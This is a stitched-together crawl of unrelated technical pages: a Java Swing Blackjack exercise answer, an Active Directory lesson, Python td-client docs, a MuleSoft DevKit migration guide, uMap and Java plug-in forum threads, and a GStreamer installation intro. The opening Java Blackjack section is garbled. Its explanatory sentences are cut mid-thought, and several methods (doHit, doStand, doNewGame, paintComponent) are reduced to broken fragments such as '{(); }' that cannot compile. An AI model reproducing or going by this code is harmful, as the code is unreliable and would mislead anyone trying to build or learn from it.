classes defined in Card.java, Hand.java, Deck.java, and BlackjackHand.java. Here is an applet version of the program for you to try: The constructor for this exercise can be almost identical to that in the HighLow game. The text of the buttons just has to be changed from "Higher" and "Lower" to "Hit" and "Stand". However, the nested class, CardPanel has to be rewritten to implement a game of Blackjack instead of a game of HighLow. The basic structure of the revised class remains similar to the original. All the programming for the game is in this BlackComponent()Component() method checks the state when it draws the applet. If the game is over, the card is face up. If the game is in progress, the card is face down. This is nice example of state-machine thinking. Note that writing the paintComponent() method required some calculation. The cards are 80 pixels wide and 100 pixels tall. Horizontally, there is a gap of 10 pixels between cards, and there are gaps of 10 pixels between the cards and the left and right edges. (The total width needed for the card panel, 460, allows for five 80-pixel cards and six 10-pixel gaps: 5*80 + 6*10 = 460. The applet is another 6 pixels wide because of a 3-pixel wide border on each side).Component() method. Allowing 100 pixels for the second row of cards and 30 pixels for the message at the bottom of the board, we need a height of at least 290 pixels for the canvas. I set the preferred height of the panel to 310 to for some extra space between the cards and the message at the bottom of the panel. The applet has an even greater height to allow for the height of the button bar below the card panel. In this GUI version of Blackjack, things happen when the user clicks the "Hit", "Stand", and "New Game" buttons. The program. This is similar to the way the three buttons in HighLowGUI are handled. 
as soon as it starts, so gameIsProgress has to be false, and the only action that the user can take at that point is to click the "New Game" button again. (Note that the doNewGame() routine is also called by the constructor of the BlackjackPanel class. This sets up the first game, when the panel still. import java.awt.*; import java.awt.event.*; import javax.swing.*; /** * In this program, the user plays a game of Blackjack. The * computer acts as the dealer. The user plays by clicking * "Hit!" and "Stand!" buttons. * * This class defines a panel, but it also contains a main() * routine that makes it possible to run the program as a * stand-alone application. In also contains a public nested * class, BlackJackGUI.Applet that can be used as an applet version * of the program. * When run as an applet the size should be about 466 pixels wide and * about 346 pixels high. That width is just big enough to show * 2 rows of 5 cards. The height is probably a little bigger * than necessary, to allow for variations in the size of buttons * from one platform to another. * * This program depends on the following classes: Card, Hand, * BlackjackHand, Deck. */ public class BlackjackGUI extends JPanel { /** * The main routine simply opens a window that shows a BlackjackGUI. */ public static void main(String[] args) { JFrame window = new JFrame("Blackjack"); BlackjackGUI content = new BlackjackGUI(); window.setContentPane(content); window.pack(); // Set size of window to preferred size of its contents. window.setResizable(false); // User can't change the window's size. Dimension screensize = Toolkit.getDefaultToolkit().getScreenSize(); window.setLocation( (screensize.width - window.getWidth())/2, (screensize.height - window.getHeight())/2 ); window.setDefaultCloseOperation( JFrame.EXIT_ON_CLOSE ); window.setVisible(true); } /** * The public static class BlackjackGUI.Applet represents this program * as an applet. The applet's init() method simply sets the content * pane of the applet to be a HighLowGUI. To use the applet on * a web page, use code="BlackjackGUI$Applet.class" as the name of * the class. */ public static class Applet extends JApplet { public void init() { setContentPane( new BlackjackGUI() ); } } /** * The constructor lays out the panel. A CardPanel occupies the CENTER * position of the panel (where CardPanel is a subclass of JPanel that is * defined below). On the bottom is a panel that holds three buttons. * The CardPanel listens for ActionEvents from the buttons and does all * the real work of the program. */ public BlackjackGUI() { setBackground( new Color(130,50,40) ); setLayout( new BorderLayout(3,3) ); CardPanel board = new CardPanel(); add(board, BorderLayout.CENTER); JPanel buttonPanel = new JPanel(); buttonPanel.setBackground( new Color(220,200,180) ); add(buttonPanel, BorderLayout.SOUTH); JButton hitButton = new JButton( "Hit!" ); hitButton.addActionListener(board); buttonPanel.add(hitButton); JButton standButton = new JButton( "Stand!" ); standButton.addActionListener(board); buttonPanel.add(standButton); JButton newGame = new JButton( "New Game" ); newGame.addActionListener(board); buttonPanel.add(newGame); setBorder(BorderFactory.createLineBorder( new Color(130,50,40), 3) ); } // end constructor /** * A nested class that displays the game and does all the work * of keeping track of the state and responding to user events. */ private class CardPanel extends JPanel implements ActionListener {. /** * The constructor creates the fonts and starts the first game. 
* It also sets a preferred size of 460-by-310 for the panel. * The paintComponent() method assumes that this is in fact the * size of the panel (although it can be a little taller with * no bad effect). */ CardPanel() { setPreferredSize( new Dimension(460,310) ); setBackground( new Color(0,120,0) ); smallFont = new Font("SansSerif", Font.PLAIN, 12); bigFont = new Font("Serif", Font.BOLD, 16); doNewGame(); } /** * Respond when the user clicks on a button by calling the appropriate * method. Note that the buttons are created and listening is set * up in the constructor of the BlackjackPanel class. */ public void actionPerformed(ActionEvent evt) { String command = evt.getActionCommand(); if (command.equals("Hit!")) doHit(); else if (command.equals("Stand!")) doStand(); else if (command.equals("New Game")) doNewGame(); } /** *. */ void doHit() {(); } /** * This method is called when the user clicks the "Stand!" button. * Check whether a game is actually in progress. If it is, the game * ends. The dealer takes cards until either the dealer has 5 cards * or more than 16 points. Then the winner of the game is determined. */ void doStand() {(); } /** * Called by the constructor, and called by actionPerformed() if the * user clicks the "New Game" button. Start a new game. Deal two cards * to each player. The game might end right then if one of the players * had blackjack. Otherwise, gameInProgress is set to true and the game * begins. */ void doNew(); /** * The paint method shows the message at the bottom of the * canvas, and it draws all of the dealt cards spread out * across the canvas. */ public void paintComponent(Graphics g) { super.paintComponent(g); // fill with background color. g.setFont(bigFont); g.setColor(Color.GREEN); g.drawString(message, 10, getHeight() -(); /** * Draws a card as a 80 by 100 rectangle with upper left corner at (x,y). * The card is drawn in the graphics context g. If card is null, then * a face-down card is drawn. (The cards are rather primitive!) */ void drawCard(Graphics g, Card card, int x, int y) { nested class CardPanel } // end class BlackjackGUI
http://math.hws.edu/javanotes/c6/ex9-ans.html
crawl-001
en
refinedweb
Most computers running Windows XP Professional will be clients in a Windows 2000 domain. One of the benefits of joining a Windows 2000 domain is the Active Directory service. It is important to understand the overall purpose of a directory service and the role that Active Directory plays in a Windows 2000 network. In addition, you should know about the key features of Active Directory, which have been designed to provide flexibility and ease of administration. Active Directory is the directory service included in the Windows 2000 Server products. A directory service is a network service that identifies all resources on a network and makes them accessible to users and applications. Active Directory includes the directory or data store, which is a structured database that stores information about network resources, as well as all the services that make the information available and useful. The resources stored in the directory, such as user data, printers, servers, databases, groups, computers, and security policies, are known as objects. Active Directory organizes resources hierarchically in domains, which are logical groupings of servers and other network resources under a single domain name. The domain is the basic unit of replication and security in a Windows 2000 network. Each domain includes one or more domain controllers. A domain controller is a computer running one of the Windows 2000 Server products that stores a complete replica of the domain directory. To simplify administration, all domain controllers in the domain are peers. You can make changes to any domain controller, and the updates are replicated to all other domain controllers in the domain. Active Directory further simplifies administration by providing a single point of administration for all objects on the network. Because Active Directory provides a single logon point for all network resources, an administrator can log on to one computer and administer objects on any computer in the network. In Active Directory, the directory stores information by organizing itself into sections that permit storage for a very large number of objects. As a result, the directory can expand as an organization grows, allowing you to scale from a small installation with a few hundred objects to a very large installation with millions of objects. Active Directory integrates the Internet concept of a namespace with the Windows 2000 directory services. This allows you to unify and manage the multiple namespaces that now exist in the heterogeneous software and hardware environments of corporate networks. Active Directory uses DNS for its name system and can exchange information with any application or directory that uses Lightweight Directory Access Protocol (LDAP) or Hypertext Transfer Protocol (HTTP). Because Active Directory uses DNS as its domain naming and location service, Windows 2000 domain names are also DNS names. Windows 2000 Server uses Dynamic DNS (DDNS), which enables clients with dynamically assigned addresses to register directly with a server running the DNS Service and update the DNS table dynamically. DDNS eliminates the need for other Internet naming services, such as Windows Internet Naming Service (WINS), in a homogeneous environment. Active Directory further embraces Internet standards by directly supporting LDAP and HTTP. LDAP is an Internet standard for accessing directory services, developed as a simpler alternative to the Directory Access Protocol (DAP). 
For more information about LDAP, use your Web browser to search for "RFC 1777" and retrieve the text of this RFC. Active Directory supports both LDAP version 2 and version 3. HTTP is the standard protocol for displaying pages on the World Wide Web. You can display every object in Active Directory as a Hypertext Markup Language (HTML) page in a Web browser. Thus, users receive the benefit of the familiar Web browsing model when querying and viewing objects in Active Directory. Active Directory supports several common name formats. Consequently, users and applications can access Active Directory by using the format with which they are most familiar. Table 5.3 describes some standard name formats supported by Active Directory.

Table 5.3 Standard Name Formats Supported by Active Directory

Here are some questions to help you determine whether you have learned enough to move on to the next lesson. If you have difficulty answering these questions, review the material in this lesson before beginning the next lesson. The answers are in Appendix A, "Questions and Answers."
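Because Active Directory exposes its objects through LDAP, any LDAP client can query the directory. The following is a minimal sketch using the third-party ldap3 Python library; the server name, credentials, and search base are placeholders, not values from this lesson:

from ldap3 import Server, Connection, SUBTREE

# Placeholder domain controller and account; substitute your own values.
server = Server("dc01.example.com")
conn = Connection(server, user="jsmith@example.com", password="secret", auto_bind=True)

# Search the domain partition for user objects and print two attributes.
conn.search("dc=example,dc=com", "(objectClass=user)",
            search_scope=SUBTREE, attributes=["cn", "distinguishedName"])
for entry in conn.entries:
    print(entry.cn, entry.distinguishedName)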
http://etutorials.org/Microsoft+Products/microsoft+windows+xp+professional+training+kit/Chapter+5+-+Using+the+DNS+Service+and+Active+Directory+Service/Lesson+4nbspUnderstanding+Active+Directory/
crawl-001
en
refinedweb
I try to install umap on an alwaysdata server. I follow this tutorial: At the migrate step (umap migrate) I have this error:

File "/home/*******/umap/lib/python3.6/site-packages/django/db/backends/base/base.py", line 171, in connect
    self.connection = self.get_new_connection(conn_params)
File "/home/*******/umap/lib/python3.6/site-packages/django/db/backends/postgresql/base.py", line 176, in get_new_connection
    connection = Database.connect(**conn_params)
File "/home/*******/umap/lib/python3.6/site-packages/psycopg2/__init__.py", line 164, in connect
    conn = _connect(dsn, connection_factory=connection_factory, async=async)
django.db.utils.OperationalError: could not connect to server: No such file or directory
    Is the server running locally and accepting connections on Unix domain socket "/var/run/postgresql/.s.PGSQL.5432"?

This is my local.py (I have tried lots of things for the host):

SECRET_KEY = '********'
INTERNAL_IPS = ('127.0.0.1', )
ALLOWED_HOSTS = ['*', 'postgresql-<accountname>.alwaysdata.net',]
DEBUG = True
ADMINS = (
    ('You', 'your@email'),
)
MANAGERS = ADMINS
DATABASES = {
    'default': {
        'ENGINE': 'django.contrib.gis.db.backends.postgis',
        'NAME': '********_umap',
        'USER': '********',
        'PASSWORD': '********'
        'HOST': 'postgresql-<accountname>.alwaysdata.net',
        'PORT': '5432',
        'DATABASE_HOST' = 'postgresql-<accountname>.alwaysdata.net',
    }
}

The alwaysdata team hasn't found a solution for my problem. Have you any idea? Thanks a lot.

asked 04 Apr '17, 10:37 by Suryavarman, edited 04 Apr '17, 23:39 by aseerel4c26

The last three lines of the error message are pretty clear, aren't they? It's expecting to connect to Postgres via a named pipe at /var/run/postgresql/.s.PGSQL.5432, but that file doesn't exist. Does anything named similarly exist in /var/run/postgresql/? Can you see the server running when you type "ps aux | grep postgres"? It looks like umap (which I don't have a clue about, sorry) is actually supposed to use an IP socket to connect, but somehow the database adapter is forced to only try the Unix socket. Maybe psycopg2 has some kind of config file?

answered 05 Apr '17, 15:22 by mbethke

Thanks a lot for your answer. I'm sorry for the delay. The folder /var/run/postgresql/ doesn't exist. "ps aux | grep postgres" returns nothing. I haven't found any psycopg2 config file. From psycopg2/__init__.py:

def connect(dsn=None, database=None, user=None, password=None, host=None, port=None, connection_factory=None, cursor_factory=None, async=False, **kwargs):

The input values are: user: None, password: None, database: **** (not the good one), host: None. I have forced the values inside this __init__.py file. The output error is:

django.db.utils.OperationalError: could not translate host name "postgresql−****.alwaysdata.net" to address: Name or service not known

answered 21 Apr '17, 15:14, edited 21 Apr '17, 15:17

meta: please log in and then use the "add new comment" button below mbethke's answer if you are commenting on it. Afterwards please delete this "answer".

Alwaysdata have solved my last bug: in postgresql−*.alwaysdata.net the "−" has to be changed to "-", giving postgresql-*.alwaysdata.net.

answered 22 Apr '17, 10:21
https://help.openstreetmap.org/questions/55468/umap-installation-postgresql-connection-error
CC-MAIN-2020-29
en
refinedweb
Connector Migration Guide - DevKit 3.6 to 3.7 July 8, 2015 Migrating from DevKit 3.6 to 3.7 The sections that follow list DevKit changes between versions 3.6.n and 3.7.0. New Connector Functional Testing Framework The goal of this new framework is twofold. In the first place, it eases the test development phase by decoupling Mule flows with the test logic itself: no flow references are now defined within flows and therefore a notion of Mule flows is not required from the test developer side. In the second place, it now allows connector tests to run in different Mule versions, either locally or in CloudHub in an automatic manner. As a result, we can now test connector code against multiple Mule versions, assuring backward-compatibility, forward-compatibility, and library-compatibility. Old Mule Connector Test For DevKit 3.6.n and Previous Versions Consider the following when running a test with the old test framework. Let’s consider an example with the Salesforce connector test suite. Extend from ConnectorTestCase. This class brings up methods such initializeTestRunMessage, runFlowAndGetPayload, or upsertOnTestRunMessage. These methods let you load test data through Spring beans, run a flow, get the resulting payload, and add data to a common test data container, respectively. package org.mule.modules.salesforce.automation.testcases; import org.mule.modules.tests.ConnectorTestCase; public abstract class AbstractTestCase extends ConnectorTestCase { } Load test data and set up the test context by loading test data through initializeTestRunMessage(springName), running a particular flow by means of runFlowAndGetPayload(flowName), and keeping the resulting value with upsertOnTestRunMessage(key,value). These methods require a Spring bean definition file, normally called automationSpringBeans.xml and a Mule application flows file, normally called automation-test-flows.xml. package org.mule.modules.salesforce.automation.testcases; ... public class AbortJobTestCases extends AbstractTestCase { @Before public void setUp() throws Exception { initializeTestRunMessage("abortJobTestData"); JobInfo jobInfo = runFlowAndGetPayload("create-job"); upsertOnTestRunMessage("jobId", jobInfo.getId()); } ... Execute the test, where different flows can be called by means of runFlowAndGetPayload(flowName), runFlowAndExpectProperty(flowName, propertyName, expectedObject), or runFlowWithPayloadAndExpect(flowName, expectedObject, payload), among other available methods. @Category({RegressionTests.class}) @Test public void testAbortJob() { try { JobInfo jobInfo = runFlowAndGetPayload("abort-job"); assertEquals(com.sforce.async.JobStateEnum.Aborted, jobInfo.getState()); assertEquals(getTestRunMessageValue("jobId").toString(), jobInfo.getId()); assertEquals(getTestRunMessageValue("concurrencyMode").toString(),jobInfo.getConcurrencyMode().toString()); assertEquals(getTestRunMessageValue("operation").toString(),jobInfo.getOperation().toString()); assertEquals(getTestRunMessageValue("contentType").toString(), jobInfo.getContentType().toString()); } catch (Exception e) { fail(ConnectorTestUtils.getStackTrace(e)); } } } Take-Away From the Pre-3.7 Test Framework The following is how a normal test looks like with the pre-3.7 test framework, where we can observe two things. 
On the one hand, we have the test data in a Spring bean file, which normally looks like this:

<beans xmlns="" ...>
    <context:property-placeholder
    <util:map
        <entry key="type" value="Account" />
        <entry key="concurrencyMode" value="Parallel" />
        <entry key="contentType" value="XML" />
        <entry key="externalIdFieldName" value="Id" />
        <entry key="operation" value="insert" />
    </util:map>
</beans>

This Spring file gathers all test data used throughout the entire test execution phase. On the other hand, we have a Mule application flows file, which looks like this:

<mule xmlns=""...>
    <context:property-placeholder
    <sfdc:config
    <sfdc:create-job</sfdc:create-job>
    </flow>
    <flow name="abort-job" doc:
        <sfdc:abort-job </sfdc:abort-job>
    </flow>

This Mule application flows file defines the way a Salesforce operation (keeping in mind we are working with Salesforce as an example) is executed. A flow defines a particular operation to be carried out, a name, the connector configuration to be used, and every parameter for that particular operation. A Mule application is formed by flows, which are defined in one (or many) Mule application flows files.

Therefore, in order to run a test (or a battery of tests), you define a Spring bean file along with flow files, mostly disaggregating test data, the methods to be run, and the logic of the test itself. It becomes virtually impossible to understand a test by simply reading a test class without either the Spring file or the flows file. The goal of the new connector test framework is to make a test self-contained, decoupling the test from Mule flows and Spring beans, so that only a minimal understanding of how Mule runs is needed and the test data is kept within the test itself (or close enough). The next section introduces the new connector test framework along with its features. We additionally show different use cases, including features such as pagination or Mule DataSense.

Migration Guideline to the New Framework

Migration from the previous Mule Connector Test approach to this new framework has been carefully thought out, and as a result we have easy-to-follow migration guidelines.

Iterative Migration

We strongly advise connector developers to move current connector tests to a legacy package. For example, if you currently have a package named org.mule.modules.connector.automation.testcases, rename it to org.mule.modules.connector.automation.testcases.legacy. Then create a package org.mule.modules.connector.automation.testcases, as before. This newly created package now contains every migrated test. Test resources are likely to be used within the migrated tests, and therefore we advise leaving these resources as they are, normally within src/test/resources. Some tests might not be migrated, either due to framework limitations or to developer choices. If framework limitations or problems arise during migration, inform Mule Support. Keep in mind that we currently do not pack the old framework Maven dependency required to run the legacy test suite. That said, if you maintain the legacy suite, you are required to manually add the dependency in the pom.xml file.

<dependency>
    <groupId>org.mule.modules</groupId>
    <artifactId>mule-connector-test</artifactId>
    <version>2.0.7</version>
    <scope>test</scope>
</dependency>

Calling a Connector Method Versus a Mule Flow

The major change from Mule Connector Test to this new test framework is how operations are called and executed. Let's consider the following example.

...
initializeTestRunMessage("sampleTestCaseData");
JobInfo jobInfo = runFlowAndGetPayload("create-job");
upsertOnTestRunMessage("jobId", jobInfo.getId());
...

We first need to load the test data by means of a Spring bean, called sampleTestCaseData, defined in an external Spring beans file. Next, we need to run a Mule flow, called create-job, also defined in an external file. Finally, we need to add the recently obtained job identifier to a common data container for later use. This requires understanding Spring beans, Mule flows, and three different methods from ConnectorTestCase just to execute a simple create job operation.

We have radically changed this approach. We have simplified the way a test developer writes a test by enabling direct access to the operations of a connector. Only special operations, such as paginated ones, require alternative methods. Considering the same example as before, and assuming that we already have a connector mockup instance, we now have a simplified interface, as follows:

...
JobInfo jobInfo = connector.createJob(OperationEnum.insert, "Account", "Id", ContentType.XML, ConcurrencyMode.Parallel);

The main characteristic is that the concept of Mule flows disappears and test data is bundled within the test itself.

Test Data Management
Test data is currently maintained within Spring beans. We encourage you to drop Spring beans and follow these practices:

If test objects are simple (Strings, Integers, and so on), just add them to the test itself, as in:

JobInfo jobInfo = connector.createJob(OperationEnum.insert, "Account", "Id", ContentType.XML, ConcurrencyMode.Parallel);

If test objects are complex, such as domain objects, implement a DataBuilder and use it as follows:

List<Map<String, Object>> batchPayload = DataBuilder.createdBatchPayload();
batchInfo = connector.createBatch(jobInfo, batchPayload);

Implementing a DataBuilder is mandatory to keep tests consistent. However, the DataBuilder can read the existing Spring beans to load already defined objects, or create new ones from scratch following the builder pattern. If loading existing Spring beans to build objects, one possible way is to use an ApplicationContext inside the data builder class, as follows:

import ...

public class TestDataBuilder {

    private ApplicationContext context;

    public TestDataBuilder() {
        context = new ClassPathXmlApplicationContext("automationSpringBeans.xml");
    }

    public CustomObjectType createCustomTestData() {
        return (CustomObjectType) context.getBean("customObject");
    }

    public void shutDownDataBuilder() {
        ((ConfigurableApplicationContext) context).close();
    }
}

@Configurable Fields Not Supported at @Connector/@Module Class Level
In DevKit 3.7.n, @Configurable fields in @Connector and/or @Module classes are no longer encouraged. You should move @Configurable fields to a proper @Config.

3.6.n Connector Example
The following shows how the @Connector class was coded in version 3.6.n:

@Connector(name="my-connector", friendlyName="MyConnector")
public class MyConnector {

    @Configurable
    String token;

    @Config
    ConnectorConfiguration config;

    @Processor
    public String myProcessor(String param) {
        ...
    }
}

3.7.n Connector Example
The following shows how the @Connector class is now coded in version 3.7.n:

@Connector(name="my-connector", friendlyName="MyConnector")
public class MyConnector {

    @Config
    ConnectorConfiguration config;

    @Processor
    public String myProcessor(String param) {
        ...
    }
}

@Configuration(configElementName="config", friendlyName="Configuration")
public class ConnectorConfiguration {

    @Configurable
    String token;

    // More Configurable Fields …
}

Important: If you want to share @Configurable fields between @Config classes, create an abstract class and make all your @Config classes extend that parent class, which contains the shared @Configurable fields (a minimal sketch appears at the end of this guide).

@Inject is Not Supported at @Processor Level
Mule 3.7 is compliant with the JSR-330 specification. Because of that, the @Inject annotation at @Processor level is invalid. Starting with DevKit 3.7, if the method signature has either MuleEvent or MuleMessage as a parameter, DevKit properly injects the parameter when the processor is called.

Important: DevKit does not support the JSR-330 specification.

3.6.n Legacy @Inject Example
The following shows how @Inject was used in version 3.6.n:

@Inject
@Processor
public boolean parameterInjectionModule(MuleEvent event, MuleMessage message) throws Exception {
    if(event == null || message == null) {
        throw new RuntimeException("MuleEvent or MuleMessage cannot be null");
    }
    return true;
}

3.7.n @Processor Example With Parameter Injection
The following shows how to inject a parameter in version 3.7.n:

@Processor
public boolean parameterInjectionModule(MuleEvent event, MuleMessage message) throws Exception {
    if(event == null || message == null) {
        throw new RuntimeException("MuleEvent or MuleMessage cannot be null");
    }
    return true;
}
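As a hypothetical illustration of the shared-configuration advice given in the @Configurable section above (the class names here are made up for the example and are not taken from the original guide):

// Abstract parent holding the @Configurable fields shared by several configs.
public abstract class AbstractSharedConfiguration {

    @Configurable
    String token;
}

@Configuration(configElementName="config", friendlyName="Configuration")
public class ConnectorConfiguration extends AbstractSharedConfiguration {

    // @Configurable fields specific to this particular config go here.
}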
https://docs.mulesoft.com/release-notes/connector/connector-migration-guide-mule-3.6-to-3.7
CC-MAIN-2020-29
en
refinedweb
This article explains how to use the Python bindings for the REST API.

Prerequisites
- Basic knowledge of Arm Treasure Data, including the Toolbelt.
- A table with some data. An example is provided in the Getting Started guide.
- Basic knowledge of our query language.
- Python 3.5+

Installation
The Python bindings are released on PyPI as td-client ('td' stands for 'T'reasure 'D'ata). You can install the package with pip or easy_install:

pip install td-client

The source code is available at github.

List Databases and Tables
The example below lists the databases and tables. The API key is your authentication key. Please refer here to retrieve your API key.

import os
import tdclient

apikey = os.getenv("TD_API_KEY")
with tdclient.Client(apikey) as client:
    for db in client.databases():
        for table in db.tables():
            print(table.db_name)
            print(table.table_name)
            print(table.count)

Issue Queries
The example below issues a query from a Python program. The query API is asynchronous; you can check for query completion by polling the job periodically (for example, by issuing job.finished() calls).

import os
import tdclient

apikey = os.getenv("TD_API_KEY")
with tdclient.Client(apikey) as client:
    job = client.query("sample_datasets", "SELECT COUNT(1) FROM www_access")
    # sleep until the job finishes
    job.wait()
    for row in job.result():
        print(row)

If you would like to get the result's schema, you need to call job.result_schema after the job has finished.

List and Get the Status of Jobs
The example below lists and gets the status of jobs.

import os
import tdclient

apikey = os.getenv("TD_API_KEY")
with tdclient.Client(apikey) as client:
    # recent 20 jobs
    len(client.jobs())
    # recent 127 jobs of a specific status
    client.jobs(0, 127, "running")
    client.jobs(0, 127, "success")
    client.jobs(0, 127, "error")
    client.jobs(0, 127, "killed")
    # get job status
    client.job(job_id)
    # get job result
    client.job_result(job_id)
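For example, a minimal sketch that combines the query call above with the schema check mentioned earlier (the exact shape of the value returned by job.result_schema may vary):

import os
import tdclient

apikey = os.getenv("TD_API_KEY")
with tdclient.Client(apikey) as client:
    job = client.query("sample_datasets", "SELECT COUNT(1) FROM www_access")
    job.wait()                # make sure the job has finished
    print(job.result_schema)  # column names and types of the result set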
https://support.treasuredata.com/hc/en-us/articles/360001264848-Python-Client
CC-MAIN-2020-29
en
refinedweb
C Extensions

Extending Ruby with C extensions is relatively easy. Here is a tutorial in basic extension creation. Here is the README about converting Ruby to C types and vice versa.

Typically a C extension looks like

file go.c

#include "ruby.h"

void Init_go() {
}

Then you create a makefile for it by using the mkmf library.
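For example, a minimal extconf.rb (the conventional file name) that uses mkmf to generate the Makefile for the go.c file above might look like this:

# extconf.rb - generate a Makefile for the extension using mkmf
require 'mkmf'
create_makefile('go')   # 'go' matches the Init_go entry point in go.c

Running ruby extconf.rb and then make builds the extension, which can afterwards be loaded with require 'go'.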
http://en.m.wikibooks.org/wiki/Ruby_Programming/C_Extensions
CC-MAIN-2014-10
en
refinedweb
Writing Plug-Ins (Not web) Aaron Roberts Ranch Hand Joined: Sep 10, 2002 Posts: 174 posted Aug 29, 2003 12:05:00 0 I want to write a file editor and provide the ability to use plug-ins. If this were a picture editor then I would want to allow people to write their own plug-in to load new picture formats. Another plug-in example would be winAmp. People can write their own visualizations and just drop them into the specific directory. Any ideas? Best regards, Aaron R> Bear Bibeault Author and ninkuma Marshal Joined: Jan 10, 2002 Posts: 59653 61 I like... posted Aug 29, 2003 15:54:00 0 This is exactly the type of thing interfaces are very good for. You will provide and publish an interface that your code will treat all plug-ins as, and others can write classes that implement that interface. You load the class(es) as an implementation of that interface and the details of the implementation are not important to you. hth, bear [ Asking smart questions ] [ Bear's FrontMan ] [ About Bear ] [ Books by Bear ] Aaron Roberts Ranch Hand Joined: Sep 10, 2002 Posts: 174 posted Aug 29, 2003 16:08:00 0 Thanks for the reply. What I want to do though, is allow people to compile a class which implements my interface and then use it at runtime - ie load the class dynamically. I stumbled across the ClassLoader class. If I understand correctly, I need to implement a custom class loader, which will handle loading classes which implement my interface. IE - PersonalClassLoader implements ClassLoader { .... } public interface CustomFileReader{ public loadFile(File xx) public saveFile(File xx) } The PersonalClassLoader would work with classes which implement the CustomFileReader interface. Can someone tell me if I'm on the right path or not? Regards, Aaron R> PS - Sorry if the pseudo code is goofy. I've been doing C# for the past few months and my syntax-s might be slightly jumbled. [ August 29, 2003: Message edited by: Aaron Roberts ] Ernest Friedman-Hill author and iconoclast Marshal Joined: Jul 08, 2003 Posts: 24165 30 I like... posted Aug 29, 2003 16:20:00 0 You don't necessarily have to write a ClassLoader . The simplest possibility is if you've got the name of the class to load in the String "className" (say somebody typed it in) and the interface is named PlugIn then you can get an instance with just one line of code: PlugIn plugin = (PlugIn) Class.forName(className).newInstance(); [Jess in Action] [AskingGoodQuestions] Aaron Roberts Ranch Hand Joined: Sep 10, 2002 Posts: 174 posted Aug 29, 2003 16:48:00 0 My intent was to have a directory where people would place their plug-in. At run time I would scan the directory and then load each plug-in. If the name of the file was also the name of the class, would I be able to still use the method you mentioned? Can you point me to some pseudo code? Thanks for the input! Its really appreciated! Best regards, Aaron R> Ernest Friedman-Hill author and iconoclast Marshal Joined: Jul 08, 2003 Posts: 24165 30 I like... posted Aug 29, 2003 17:04:00 0 Yes, absolutely, you can do this. In Java, the name of the file is always the name of the class (modulo package names and things.) As far as directory-scanning pseudocode, use java.io.File.list() to get an array of File objects representing the contents of a directory, then use a for-loop to loop over it, and then do whatever you're going to do (strip off the .class extension and use the Class.forName() thing we talked about.) It's really an easy thing to do. 
The very popular Eclipse IDE has a plug-in architecture, and the way they handle the details of class names and package names, etc, is that a plugin is always a JAR file or a subdirectory, and the plugin always includes a file named plugin.xml, and the XML file specifies what class the IDE should load (as well as other configuration info.) That way a plugin can consist of multiple classes, only one of which implements your interface.

Aaron Roberts Ranch Hand Joined: Sep 10, 2002 Posts: 174

posted Sep 20, 2003 18:31:00 0

Just a followup. I was able to get everything working correctly, after a bit of tinkering. I discovered the following things -
- If you want the plugins located in another directory, then you have to put the plugin under a package with the same name as the deployment directory.
- If you want to have the plugin reside in the same directory as the class which contains the static main method, then just compile the plugin with no package description.

Below is some sample code

package PluginDemo;

import java.io.*;
import java.util.*;

public class TestPlugins {
    public static void main(String[] args) {
        ArrayList classList = new ArrayList();
        File dir = new File("./plugins");
        File[] files = dir.listFiles();
        ArrayList plugins = new ArrayList();

        // Remove the .class portion from the file name
        for(int i = 0; i < files.length; i++)
            classList.add(files[i].getName().substring(0, files[i].getName().length() - 6));

        for(int i = 0; i < classList.size(); i++) {
            System.out.println("Plugin " + i + " is: " + classList.get(i));
        }

        try {
            for(int i = 0; i < classList.size(); i++)
                plugins.add((IPlugIn)Class.forName("plugins." + classList.get(i).toString()).newInstance());
        } catch(Exception ex) {
            System.out.println("Exception:" + ex);
        }

        IPlugIn pi = null;
        for(int i = 0; i < plugins.size(); i++) {
            pi = (IPlugIn)plugins.get(i);
            System.out.println("Plugin says: " + pi.getNumber() + " " + pi.getString());
        }
    }
}

Below is the interface for the plugins -

package PluginDemo;

public interface IPlugIn {
    public int getNumber();
    public String getString();
}

And lastly here is a sample plugin -

package plugins;

import PluginDemo.*;

public class Plugin1 implements IPlugIn {
    public int getNumber() {
        return 1; // This is the first plugin test
    }
    public String getString() {
        return "I am plugin number 1!";
    }
}

You would place the compiled plugin under the PluginDemo/plugin directory. I hope this helps! Regards, Aaron

Stefan Wagner Ranch Hand Joined: Jun 02, 2003 Posts: 1923 I like...

posted Sep 22, 2003 17:40:00 0

I wrote an editor with following similarities: User can write their own plugins. They put their plugins in a special subdirectory (plugins/). The app reads all class-Files in this directory, which end with 'Plugin.class' (so their Plugin may invoke other own classes in that directory, which are used by their plugins, without being an own plugin). The plugins are loaded with 'Class.forName (...)'. The editor is MUCH more simple than eclipse.
And the plugins are very restricted: They get marked text, may process on this, and give some other text back, so the interface is defined as:

public interface PledPlugin {
    public String doCommand (String in);
    /* and some helpful methods, to display a menu-entry
       and create buttons for a toolbar */
    public Image getIcon ();
    public String getCommandName ();
}

The full project is available at:
http://www.coderanch.com/t/371711/java/java/Writing-Plug-Ins-web
CC-MAIN-2014-10
en
refinedweb
Malcolm Wallace wrote: > A: > I've digested this, and I hope can regurgitate the key points for anyone wishing to grasp it quickly. Please correct me if I get anything wrong: - the proposal is to let you specify grafting in the source code - you graft a *sub-hierarchy* of a package anywhere in the global module namespace (the sub-hiearchy bit is new, I haven't seen this proposed before). - you can also graft a sub-hierarchy of a package onto the *current module*, so that it becomes available when importing this module. This is new too. Personally I'm not convinced the extra generality of grafting sub-hierarchies is necessary. The re-export idea is interesting, though. Cheers, Simon
http://www.haskell.org/pipermail/libraries/2006-July/005481.html
CC-MAIN-2014-10
en
refinedweb
Python Multimedia

So let's get on with it!

Installation prerequisites
Since we are going to use an external multimedia framework, it is necessary to install the packages mentioned in this section.

GStreamer
GStreamer is a popular open source multimedia framework that supports audio/video manipulation of a wide range of multimedia formats. It is written in the C programming language and provides bindings for other programming languages including Python. Several open source projects use the GStreamer framework to develop their own multimedia applications. Throughout this article, we will make use of the GStreamer framework for audio handling. In order to get this working with Python, we need to install both GStreamer and the Python bindings for GStreamer.

Windows platform
The binary distribution of GStreamer is not provided on the project website. Installing it from the source may require considerable effort on the part of Windows users. Fortunately, the GStreamer WinBuilds project provides pre-compiled binary distributions. Here is the URL to the project website:

The binary distribution for GStreamer as well as its Python bindings (Python 2.6) are available in the Download area of the website:

You need to install two packages. First the GStreamer, and then the Python bindings to the GStreamer. Download and install the GPL distribution of GStreamer available on the GStreamer WinBuilds project website. The name of the GStreamer executable is GStreamerWinBuild-0.10.5.1.exe. The version should be 0.10.5 or higher. By default, this installation will create a folder C:\gstreamer on your machine. The bin directory within this folder contains runtime libraries needed while using GStreamer.

